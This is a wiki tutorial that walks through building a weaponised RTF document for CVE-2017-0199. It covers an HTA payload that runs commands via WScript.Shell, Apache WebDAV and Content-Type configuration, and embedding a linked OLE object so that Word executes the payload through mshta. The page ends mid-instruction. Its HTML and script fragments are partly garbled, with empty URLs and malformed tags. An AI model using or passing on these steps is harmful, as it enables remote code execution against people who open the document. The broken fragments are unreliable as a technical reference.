CVE-2017-0199 Malicious RTF Document

From ICO wiki

CVE-2017-0199 Malicious RTF Document

Step 1

Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta"

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">  
   <html xmlns="">  
   <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />  
a=new ActiveXObject("WScript.Shell");'chrome',0);
   <object type="text/html" data="" width="100%" height="100%">  

Step 2

Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")

Call it "ms.rtf"

Step 3

Push these 2 files on a webserver you have full control on. We supposed it will be stored in /var/www/html

Now we have to configure Apache to be able to include the ms.rtf as a link

 a2enmod dav  
 a2enmod dav_fs  
 a2enmod dav_lock  
 a2enmod headers  
 service apache2 restart 

The following directive will : - Add "Content-Type application/rtf to all files in /ms - Allow the PROPFIND request performed by Microsoft Office

Modify virtualhost and include:

 <Directory /var/www/html/ms/>  
 Header set Content-Type "application/rtf"  
 <Directory />  
 Dav on  
 service apache2 restart 

Step 4

Create a simple RTF document using Winword "exploit.rtf" This will be our exploit !

Insert -> Object


After clicking OK you will get the content of the "ms.rtf" file which just contains a random string..

Save the file as "exploit.rtf"

Step 5

The following step will : - change the ms.rtf that we have included with the custom HTA payload - The web server will send a "application/hta" content-type... this will be interpreted by the Winword client which will run mshta to handle this content-type and execute our payload

cat /var/www/html/ms/ms.hta > /var/www/html/ms.rtf  
vi /etc/apache2/sites-enables/000-default  
Change -> application/rtf to application/hta  

<Directory /var/www/html/ms/>  
Header set Content-Type "application/hta"  

service apache2 restart

Step 6

At this step, if the user opens the "exploit.rtf" file he will have to double click on the link object to launch the attack...

If we want the OLE object to be loaded automatically at the opening of the document we have to edit the exploit.rtf file and change: